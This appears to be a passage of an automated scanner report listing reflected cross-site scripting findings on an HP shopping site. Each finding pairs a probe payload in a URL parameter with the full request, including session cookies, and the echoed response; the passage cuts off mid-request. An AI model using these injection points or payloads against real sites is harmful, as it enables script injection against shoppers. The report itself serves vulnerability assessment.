X-Powered-By: Servlet/2.4 JSP/2.0
Vary: Accept-Encoding
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 225497

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">


<html lang="en">
<head>
<!-- hp
...[SNIP]...
// Commented out below lines to remove directLink
var omni_landing = 'rts_desktop';
var omni_category = 'rts_desktop';
var omni_catLevel = '3';
var omni_subcat1 = 'rts1272f';d8b7fc6fcc3';

//Script added to introduce New Omniture Variables
if(omni_landing == null || omni_landing == '' || omni_landing == 'null')
omni_landing = '';
if(omni_category == n
...[SNIP]...

1.34. http://www.shopping.hp.com/webapp/shopping/product_detail.do [&subcat1 parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.shopping.hp.com
Path:   /webapp/shopping/product_detail.do

Issue detail

The value of the &subcat1 request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9d02b"%3ba37f49f5348 was submitted in the &subcat1 parameter. This input was echoed as 9d02b";a37f49f5348 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /webapp/shopping/product_detail.do?storeName=storefronts&landing=rts_desktop&category=rts_desktop&&subcat1=rts9d02b"%3ba37f49f5348&catLevel=3&mc=&product_code=BV704AA%23ABA&tab=&fromPage=/shopping/product_comparison.do&pageLink=true&bvLoadCart=1&omniData= HTTP/1.1
Host: www.shopping.hp.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.shopping.hp.com/webapp/shopping/product_comparison.do
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2731D29105161EB6-600001A4C0302EDC[CE]; OV_VISTA_2009_04_09=0; hpcomsh_usen=s1=xss%20printer&s1_context=hpcomsearch&s2=xss+printer&s2_context=hhostore&s3=xss&s3_context=hpcomsearch; s_pn=gw:us:en-us:home; s_re=ams; lang=en-us; cc=us; OAX=Mhd7ak56iIkAATNs; _rmc_n=2; HHOJSID=LRgpT6MFm4zJCr4b99PqVpYCwCngnLth4hy6S0fnYbY2fBYN5tNm!133787182; HP_EBUS=true; ijumpstack=%5B%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_desktops_home4923e%2527%253B1cd62d1ca9e'%2C'1316671059055'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Fdesktops%2Fpromo_tile%2F1%2Fdt_promo_tile1_budget_friendly_921'%2C'1316671280652'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fmasthead%2Ffreeshipping'%2C'1316671282221'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_accessories'%2C'1316672330059'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fesp%2Flaptops_and_mini_pcs'%2C'1316672333032'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Fdesktops%2Fall-in-one_pcs'%2C'1316672342103'%5D%5D; prop12=r602; s_var_20=re_r602_dp_bg7_na_ipg_mar11_psaioa_pseaio1; jumpstack=%5B%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Fdesktops%2Fpromo_tile%2F1%2Fdt_promo_tile1_budget_friendly_921'%2C'1316671280650'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fmasthead%2Ffreeshipping'%2C'1316671282219'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_accessories'%2C'1316672330058'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fesp%2Flaptops_and_mini_pcs'%2C'1316672333031'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Fdesktops%2Fall-in-one_pcs'%2C'1316672342102'%5D%2C%5B're_r602_dp_bg7_na_ipg_mar11_psaioa_pseaio1'%2C'1316672374381'%5D%5D; ljumpstack=%5B%5B're_r602_dp_bg7_na_ipg_mar11_psaioa_pseaio1'%2C'1316672374382'%5D%5D; hpshopping=1&user_id=mlkoiNyT2w59Nijvv1PXcQyYmmvi&home_slot_1=BV704AA%23ABA%7CLP011AV%23ABA&home_slot_1_type=0%7CCTO&home_slot_1_category=0%7Cdesktops%2Fp7xt_series&home_slot_1_Affix=0%7CGSedf6ffb9e8a695fbc9b6831d&cart_id=1603777571; hpcompc_usen=cartExists=true; EMID=; s_depth=29; hp_cust_seg_sel=HHO; 
gpv_pN=hho%3Ags%3Acompare; s_cc=true; s_sq=hphqglobal%2Chphqna%2Chphqhhorollup%2Chphqnahpshopping%3D%2526pid%253Dhho%25253Ags%25253Acompare%2526pidt%253D1%2526oid%253Dfunctiononclick(event)%25257Bjavascript%25253AitemAdded('ADD_14182135_TO_CART'%25252C'SUBMIT_14182135_IMAGE'%25252C'big'%25252C'0'%2526oidt%253D2%2526ot%253DBUTTON%26hphqhhomktg%3D%2526pid%253Dhttp%25253A%25252F%25252Fwww.hp.com%25252Funited-states%25252Fconsumer%25252Fdigital_photography%25252Fbuying_guides%25252Faio.html%25253Fjumpid_t%25253Dreg_R1002_USEN%2526oid%253Dhttp%25253A%25252F%25252Fwww.shopping.hp.com%25252Fwebapp%25252Fshopping%25252Fstore_access.do%25253Fproduct_code%25253DCN731A%25252523B1H%252526template_type%25253Dp%2526ot%253DA

Response

HTTP/1.1 200 OK
Date: Thu, 22 Sep 2011 01:30:38 GMT
Server: Apache/2.0.59 HP-UX_Apache-based_Web_Server (Unix) DAV/2 mod_ssl/2.0.59 OpenSSL/0.9.8k
Cache-Control: private
Set-Cookie: hpshopping=1&user_id=mlkiiN%2BV3gt6OintvFTXcgOe0ic%3D&home_slot_1=BV704AA%23ABA%7CLP011AV%23ABA&home_slot_1_type=0%7CCTO&home_slot_1_category=0%7Cdesktops%2Fp7xt_series&home_slot_1_Affix=0%7CGSedf6ffb9e8a695fbc9b6831d&cart_id=1603777571; expires=Friday, 20-Jan-2012 01:30:39 GMT; path=/
Set-Cookie: hpcompc_usen=cartExists=true; domain=.hp.com; expires=Friday, 20-Jan-2012 01:30:39 GMT; path=/
X-Powered-By: Servlet/2.4 JSP/2.0
Vary: Accept-Encoding
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 225497

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">


<html lang="en">
<head>
<!-- hp
...[SNIP]...
adReviewsLink() {
return "javascript:retrieveURL('http://www.shopping.hp.com/webapp/shopping/product_detail.do?storeName=storefronts&landing=rts_desktop&category=rts_desktop&subcat1=rts9d02b";a37f49f5348&product_code=BV704AA%23ABA&catLevel=3&mc=&ajaxCall=true&tab=reviews', 'ProductContent');javascript:tabControl('pdp_reviewsTab_on');javascript:currentTab('reviews');";
}
//-->
...[SNIP]...

1.35. http://www.shopping.hp.com/webapp/shopping/product_detail.do [&subcat1 parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.shopping.hp.com
Path:   /webapp/shopping/product_detail.do

Issue detail

The value of the &subcat1 request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6c169"%20a%3db%20e63dfdaca2b was submitted in the &subcat1 parameter. This input was echoed as 6c169" a=b e63dfdaca2b in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /webapp/shopping/product_detail.do?storeName=storefronts&landing=rts_desktop&category=rts_desktop&&subcat1=rts6c169"%20a%3db%20e63dfdaca2b&catLevel=3&mc=&product_code=BV704AA%23ABA&tab=&fromPage=/shopping/product_comparison.do&pageLink=true&bvLoadCart=1&omniData= HTTP/1.1
Host: www.shopping.hp.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.shopping.hp.com/webapp/shopping/product_comparison.do
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2731D29105161EB6-600001A4C0302EDC[CE]; OV_VISTA_2009_04_09=0; hpcomsh_usen=s1=xss%20printer&s1_context=hpcomsearch&s2=xss+printer&s2_context=hhostore&s3=xss&s3_context=hpcomsearch; s_pn=gw:us:en-us:home; s_re=ams; lang=en-us; cc=us; OAX=Mhd7ak56iIkAATNs; _rmc_n=2; HHOJSID=LRgpT6MFm4zJCr4b99PqVpYCwCngnLth4hy6S0fnYbY2fBYN5tNm!133787182; HP_EBUS=true; ijumpstack=%5B%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_desktops_home4923e%2527%253B1cd62d1ca9e'%2C'1316671059055'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Fdesktops%2Fpromo_tile%2F1%2Fdt_promo_tile1_budget_friendly_921'%2C'1316671280652'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fmasthead%2Ffreeshipping'%2C'1316671282221'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_accessories'%2C'1316672330059'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fesp%2Flaptops_and_mini_pcs'%2C'1316672333032'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Fdesktops%2Fall-in-one_pcs'%2C'1316672342103'%5D%5D; prop12=r602; s_var_20=re_r602_dp_bg7_na_ipg_mar11_psaioa_pseaio1; jumpstack=%5B%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Fdesktops%2Fpromo_tile%2F1%2Fdt_promo_tile1_budget_friendly_921'%2C'1316671280650'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fmasthead%2Ffreeshipping'%2C'1316671282219'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_accessories'%2C'1316672330058'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fesp%2Flaptops_and_mini_pcs'%2C'1316672333031'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Fdesktops%2Fall-in-one_pcs'%2C'1316672342102'%5D%2C%5B're_r602_dp_bg7_na_ipg_mar11_psaioa_pseaio1'%2C'1316672374381'%5D%5D; ljumpstack=%5B%5B're_r602_dp_bg7_na_ipg_mar11_psaioa_pseaio1'%2C'1316672374382'%5D%5D; hpshopping=1&user_id=mlkoiNyT2w59Nijvv1PXcQyYmmvi&home_slot_1=BV704AA%23ABA%7CLP011AV%23ABA&home_slot_1_type=0%7CCTO&home_slot_1_category=0%7Cdesktops%2Fp7xt_series&home_slot_1_Affix=0%7CGSedf6ffb9e8a695fbc9b6831d&cart_id=1603777571; hpcompc_usen=cartExists=true; EMID=; s_depth=29; hp_cust_seg_sel=HHO; 
gpv_pN=hho%3Ags%3Acompare; s_cc=true; s_sq=hphqglobal%2Chphqna%2Chphqhhorollup%2Chphqnahpshopping%3D%2526pid%253Dhho%25253Ags%25253Acompare%2526pidt%253D1%2526oid%253Dfunctiononclick(event)%25257Bjavascript%25253AitemAdded('ADD_14182135_TO_CART'%25252C'SUBMIT_14182135_IMAGE'%25252C'big'%25252C'0'%2526oidt%253D2%2526ot%253DBUTTON%26hphqhhomktg%3D%2526pid%253Dhttp%25253A%25252F%25252Fwww.hp.com%25252Funited-states%25252Fconsumer%25252Fdigital_photography%25252Fbuying_guides%25252Faio.html%25253Fjumpid_t%25253Dreg_R1002_USEN%2526oid%253Dhttp%25253A%25252F%25252Fwww.shopping.hp.com%25252Fwebapp%25252Fshopping%25252Fstore_access.do%25253Fproduct_code%25253DCN731A%25252523B1H%252526template_type%25253Dp%2526ot%253DA

Response

HTTP/1.1 200 OK
Date: Thu, 22 Sep 2011 01:30:35 GMT
Server: Apache/2.0.59 HP-UX_Apache-based_Web_Server (Unix) DAV/2 mod_ssl/2.0.59 OpenSSL/0.9.8k
Cache-Control: private
Set-Cookie: hpshopping=1&user_id=mlkiiN%2BV3gt6OintvFTXcgOe0ic%3D&home_slot_1=BV704AA%23ABA%7CLP011AV%23ABA&home_slot_1_type=0%7CCTO&home_slot_1_category=0%7Cdesktops%2Fp7xt_series&home_slot_1_Affix=0%7CGSedf6ffb9e8a695fbc9b6831d&cart_id=1603777571; expires=Friday, 20-Jan-2012 01:30:36 GMT; path=/
Set-Cookie: hpcompc_usen=cartExists=true; domain=.hp.com; expires=Friday, 20-Jan-2012 01:30:36 GMT; path=/
X-Powered-By: Servlet/2.4 JSP/2.0
Vary: Accept-Encoding
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 225581

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">


<html lang="en">
<head>
<!-- hp
...[SNIP]...
<input type="hidden" name="subcat1" value="rts6c169" a=b e63dfdaca2b">
...[SNIP]...

1.36. http://www.shopping.hp.com/webapp/shopping/product_detail.do [catLevel parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.shopping.hp.com
Path:   /webapp/shopping/product_detail.do

Issue detail

The value of the catLevel request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 189ee"%20a%3db%20a5d9061744c was submitted in the catLevel parameter. This input was echoed as 189ee" a=b a5d9061744c in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /webapp/shopping/product_detail.do?storeName=computer_store&landing=desktops&category=p7xt_series&subcat1=rts&catLevel=3189ee"%20a%3db%20a5d9061744c&mc=&product_code=BV704AA%23ABA&tab=&fromPage=/shopping/generic_subcategory.do&pageLink=true&bvLoadCart=1&omniData= HTTP/1.1
Host: www.shopping.hp.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.shopping.hp.com/scat/desktops/p7xt_series/rts/3/computer_store
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2731D29105161EB6-600001A4C0302EDC[CE]; HHOJSID=HWSJT6HFQjsTjvLKGJywb6ddpcRLmz2xPdythnKG2FZ6ZGygbLyp!133787182; OV_VISTA_2009_04_09=0; hpcomsh_usen=s1=xss%20printer&s1_context=hpcomsearch&s2=xss+printer&s2_context=hhostore&s3=xss&s3_context=hpcomsearch; mbox=session#1316670895509-389686#1316672894|check#true#1316671094; s_pn=gw:us:en-us:home; s_re=ams; lang=en-us; cc=us; _rmc_n=1; OAX=Mhd7ak56iIkAATNs; s_var_20=in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fmasthead%2Ffreeshipping; jumpstack=%5B%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_services_home'%2C'1316670961899'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_printers_home'%2C'1316670966980'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_supplies_home'%2C'1316670973931'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_desktops_home4923e%2527%253B1cd62d1ca9e'%2C'1316671059055'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Fdesktops%2Fpromo_tile%2F1%2Fdt_promo_tile1_budget_friendly_921'%2C'1316671280650'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fmasthead%2Ffreeshipping'%2C'1316671282219'%5D%5D; ijumpstack=%5B%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_services_home'%2C'1316670961900'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_printers_home'%2C'1316670966980'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_supplies_home'%2C'1316670973931'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_desktops_home4923e%2527%253B1cd62d1ca9e'%2C'1316671059055'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Fdesktops%2Fpromo_tile%2F1%2Fdt_promo_tile1_budget_friendly_921'%2C'1316671280652'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fmasthead%2Ffreeshipping'%2C'1316671282221'%5D%5D; prop12=r602; hpshopping=1&user_id=mlkvid2S2AhwMy3quFbXdAbTng%3D%3D&home_slot_1=LP011AV%23ABA&home_slot_1_type=CTO&home_slot_1_category=desktops%2Fp7xt_series&home_slot_1_Affix=GS; hpcompc_usen=cartExists=false; EMID=; s_depth=18; hp_cust_seg_sel=HHO; gpv_pN=hho%3Ags%3Asubcategory%3Ap7xt%20series; 
s_cc=true; s_sq=hphqglobal%2Chphqna%2Chphqhhorollup%2Chphqnahpshopping%3D%2526pid%253Dhho%25253Ags%25253Asubcategory%25253Ap7xt%252520series%2526pidt%253D1%2526oid%253Dfunctiononclick(event)%25257Bjavascript%25253AitemAdded('ADD_14182135_TO_CART'%25252C'SUBMIT_14182135_IMAGE'%25252C'big'%25252C'2'%2526oidt%253D2%2526ot%253DBUTTON; HP_EBUS_HP_CLICKS=4x16x6397

Response

HTTP/1.1 200 OK
Date: Thu, 22 Sep 2011 01:10:26 GMT
Server: Apache/2.0.59 HP-UX_Apache-based_Web_Server (Unix) DAV/2 mod_ssl/2.0.59 OpenSSL/0.9.8k
Cache-Control: private
Set-Cookie: hpshopping=1&user_id=mlkog96V2A1%2FMS3vu1XWdAKd0ic%3D&home_slot_1=BV704AA%23ABA%7CLP011AV%23ABA&home_slot_1_type=0%7CCTO&home_slot_1_category=0%7Cdesktops%2Fp7xt_series&home_slot_1_Affix=0%7CGSedf6ffb978573aea6e9e5a11&cart_id=1603777571; expires=Friday, 20-Jan-2012 01:10:26 GMT; path=/
Set-Cookie: hpcompc_usen=cartExists=true; domain=.hp.com; expires=Friday, 20-Jan-2012 01:10:26 GMT; path=/
X-Powered-By: Servlet/2.4 JSP/2.0
Vary: Accept-Encoding
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 223830

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">


<html lang="en">
<head>
<!-- hp
...[SNIP]...
<input type="hidden" name="nextPage" value="/product_detail.do?storeName=computer_store&landing=desktops&category=p7xt_series&subcat1=rts&catLevel=3189ee" a=b a5d9061744c&mc=&product_code=BV704AA%23ABA&tab=overview&fromPage=/shopping/product_detail.do">
...[SNIP]...

1.37. http://www.shopping.hp.com/webapp/shopping/product_detail.do [catLevel parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.shopping.hp.com
Path:   /webapp/shopping/product_detail.do

Issue detail

The value of the catLevel request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 85efd'%3bd47dd6dd9bf was submitted in the catLevel parameter. This input was echoed as 85efd';d47dd6dd9bf in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /webapp/shopping/product_detail.do?storeName=computer_store&landing=desktops&category=p7xt_series&subcat1=rts&catLevel=385efd'%3bd47dd6dd9bf&mc=&product_code=BV704AA%23ABA&tab=&fromPage=/shopping/generic_subcategory.do&pageLink=true&bvLoadCart=1&omniData= HTTP/1.1
Host: www.shopping.hp.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.shopping.hp.com/scat/desktops/p7xt_series/rts/3/computer_store
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2731D29105161EB6-600001A4C0302EDC[CE]; HHOJSID=HWSJT6HFQjsTjvLKGJywb6ddpcRLmz2xPdythnKG2FZ6ZGygbLyp!133787182; OV_VISTA_2009_04_09=0; hpcomsh_usen=s1=xss%20printer&s1_context=hpcomsearch&s2=xss+printer&s2_context=hhostore&s3=xss&s3_context=hpcomsearch; mbox=session#1316670895509-389686#1316672894|check#true#1316671094; s_pn=gw:us:en-us:home; s_re=ams; lang=en-us; cc=us; _rmc_n=1; OAX=Mhd7ak56iIkAATNs; s_var_20=in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fmasthead%2Ffreeshipping; jumpstack=%5B%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_services_home'%2C'1316670961899'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_printers_home'%2C'1316670966980'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_supplies_home'%2C'1316670973931'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_desktops_home4923e%2527%253B1cd62d1ca9e'%2C'1316671059055'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Fdesktops%2Fpromo_tile%2F1%2Fdt_promo_tile1_budget_friendly_921'%2C'1316671280650'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fmasthead%2Ffreeshipping'%2C'1316671282219'%5D%5D; ijumpstack=%5B%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_services_home'%2C'1316670961900'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_printers_home'%2C'1316670966980'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_supplies_home'%2C'1316670973931'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_desktops_home4923e%2527%253B1cd62d1ca9e'%2C'1316671059055'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Fdesktops%2Fpromo_tile%2F1%2Fdt_promo_tile1_budget_friendly_921'%2C'1316671280652'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fmasthead%2Ffreeshipping'%2C'1316671282221'%5D%5D; prop12=r602; hpshopping=1&user_id=mlkvid2S2AhwMy3quFbXdAbTng%3D%3D&home_slot_1=LP011AV%23ABA&home_slot_1_type=CTO&home_slot_1_category=desktops%2Fp7xt_series&home_slot_1_Affix=GS; hpcompc_usen=cartExists=false; EMID=; s_depth=18; hp_cust_seg_sel=HHO; gpv_pN=hho%3Ags%3Asubcategory%3Ap7xt%20series; 
s_cc=true; s_sq=hphqglobal%2Chphqna%2Chphqhhorollup%2Chphqnahpshopping%3D%2526pid%253Dhho%25253Ags%25253Asubcategory%25253Ap7xt%252520series%2526pidt%253D1%2526oid%253Dfunctiononclick(event)%25257Bjavascript%25253AitemAdded('ADD_14182135_TO_CART'%25252C'SUBMIT_14182135_IMAGE'%25252C'big'%25252C'2'%2526oidt%253D2%2526ot%253DBUTTON; HP_EBUS_HP_CLICKS=4x16x6397

Response

HTTP/1.1 200 OK
Date: Thu, 22 Sep 2011 01:10:30 GMT
Server: Apache/2.0.59 HP-UX_Apache-based_Web_Server (Unix) DAV/2 mod_ssl/2.0.59 OpenSSL/0.9.8k
Cache-Control: private
Set-Cookie: hpshopping=1&user_id=mlkog96V2A1%2FMS3vu1XWdAKd0ic%3D&home_slot_1=BV704AA%23ABA%7CLP011AV%23ABA&home_slot_1_type=0%7CCTO&home_slot_1_category=0%7Cdesktops%2Fp7xt_series&home_slot_1_Affix=0%7CGSedf6ffb978573aea6e9e5a11&cart_id=1603777571; expires=Friday, 20-Jan-2012 01:10:30 GMT; path=/
Set-Cookie: hpcompc_usen=cartExists=true; domain=.hp.com; expires=Friday, 20-Jan-2012 01:10:30 GMT; path=/
X-Powered-By: Servlet/2.4 JSP/2.0
Vary: Accept-Encoding
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 223766

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">


<html lang="en">
<head>
<!-- hp
...[SNIP]...
category & subcat1 from the request
// Commented out below lines to remove directLink
var omni_landing = 'desktops';
var omni_category = 'p7xt_series';
var omni_catLevel = '385efd';d47dd6dd9bf';
var omni_subcat1 = 'rts';

//Script added to introduce New Omniture Variables
if(omni_landing == null || omni_landing == '' || omni_landing == 'null')
omni_la
...[SNIP]...

1.38. http://www.shopping.hp.com/webapp/shopping/product_detail.do [category parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.shopping.hp.com
Path:   /webapp/shopping/product_detail.do

Issue detail

The value of the category request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d244c"%20a%3db%205931038e062 was submitted in the category parameter. This input was echoed as d244c" a=b 5931038e062 in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /webapp/shopping/product_detail.do?storeName=computer_store&landing=desktops&category=p7xt_seriesd244c"%20a%3db%205931038e062&subcat1=rts&catLevel=3&mc=&product_code=BV704AA%23ABA&tab=&fromPage=/shopping/generic_subcategory.do&pageLink=true&bvLoadCart=1&omniData= HTTP/1.1
Host: www.shopping.hp.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.shopping.hp.com/scat/desktops/p7xt_series/rts/3/computer_store
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2731D29105161EB6-600001A4C0302EDC[CE]; HHOJSID=HWSJT6HFQjsTjvLKGJywb6ddpcRLmz2xPdythnKG2FZ6ZGygbLyp!133787182; OV_VISTA_2009_04_09=0; hpcomsh_usen=s1=xss%20printer&s1_context=hpcomsearch&s2=xss+printer&s2_context=hhostore&s3=xss&s3_context=hpcomsearch; mbox=session#1316670895509-389686#1316672894|check#true#1316671094; s_pn=gw:us:en-us:home; s_re=ams; lang=en-us; cc=us; _rmc_n=1; OAX=Mhd7ak56iIkAATNs; s_var_20=in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fmasthead%2Ffreeshipping; jumpstack=%5B%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_services_home'%2C'1316670961899'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_printers_home'%2C'1316670966980'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_supplies_home'%2C'1316670973931'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_desktops_home4923e%2527%253B1cd62d1ca9e'%2C'1316671059055'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Fdesktops%2Fpromo_tile%2F1%2Fdt_promo_tile1_budget_friendly_921'%2C'1316671280650'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fmasthead%2Ffreeshipping'%2C'1316671282219'%5D%5D; 